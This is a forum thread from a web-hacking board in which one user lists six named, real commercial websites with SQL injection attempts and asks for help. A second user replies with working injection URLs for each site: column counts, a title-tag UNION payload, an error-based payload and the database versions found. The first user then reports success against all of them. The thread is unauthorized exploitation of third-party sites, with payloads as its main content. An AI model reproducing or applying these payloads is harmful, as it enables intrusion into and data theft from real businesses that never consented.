Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
How do you completely compromise a machine given a text box or badly validated input box? This is a place to talk about code issues (PHP includes, null byte injection, backticks, pipe, etc...) as well as how to properly construct an SQL injection attack. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
multuiple can't count column or see vulnerable also in code source
Posted by: kenjii
Date: December 02, 2013 06:05PM

hi all
i'am having hard time with this website

havij can get it me i can't get column...
http://www.laptopmela.com/productDetails.php?id=1279

the same
http://www.baliwestimports.com/product-detail.php?id=119

this one i can't see vulnerable column in code source
http://www.muttluks.com/products.php?cat=-2 UNION SELECT 1111,2222,33333,4444,5555,6666,7777-- -&subcat=1

this one i can count column with group by but can't see vulnerable have multiple sql error
http://www.alancristea.com/bookshop.php?cat=41%20group%20by%203

can't see column even in code source :(
http://www.ehcambridge.com.au/index.php?id=3 UNION SELECT 1111,2222,3333,4444,55555,6666,7777--

the same as before
http://www.thestrapsmith.com/categories.php?cat=-13 /*!5000UNION*/ /*!50000SELECT*/ 1,2,3,4,5,6,7,8,9,10,11,12,13,14
and i also search in ajkaro tutorial and tips but i haven't see something about this



Edited 4 time(s). Last edit at 12/03/2013 07:46AM by kenjii.

Options: ReplyQuote
Re: multuiple can't count column or see vulnerable also in code source
Posted by: ajkaro
Date: December 03, 2013 06:03PM

#1 string based SQLi (21 columns) - version: 5.5.33-31.1
hXXp://wXw.lap[slackers]topmela.com/productDetails.php?id=1279' group by 21%23


#2 string absed SQLi (14 columns) - version: 5.1.72-log
hXXp://wXw.bali[slackers]westimports.com/product-detail.php?id=119' group by 14-- -


#3 use some other link - version: 5.0.92
hXXp://wXw.mut[slackers]tluks.com/page.php?pid=30


#4 injection in title tag - version: 5.1.69-0ubuntu0.10.04.1
hXXp://wXw.alancr[slackers]istea.com/bookshop.php?cat=41 and 0 Union SeLect concat(0x3c2f7469746c653e,version()),2,3%23


#5 user error based - version: 5.1.70-log
hXXp://wXw.ehcam[slackers]bridge.com.au/index.php?id=3 +or+1+group+by+concat_ws(0x00, version(),floor(rand(0)*2))+having+min(0)+or+1--+-

#6 There are 18 columns (not 14) - version: 5.5.34-log
hXXp://wXw.thestr[slackers]apsmith.com

Options: ReplyQuote
Re: multuiple can't count column or see vulnerable also in code source
Posted by: kenjii
Date: December 04, 2013 09:24AM

thank you very much !!
i learn a lot from this, i was able to get them all :)

Just the 1 give me some problemes
http://www.laptopmela.com/productDetails.php?id=1279

i don't know why but for make it work i need to put in url direct if i use hackbar it don't work for me....

Options: ReplyQuote


Sorry, only registered users may post in this forum.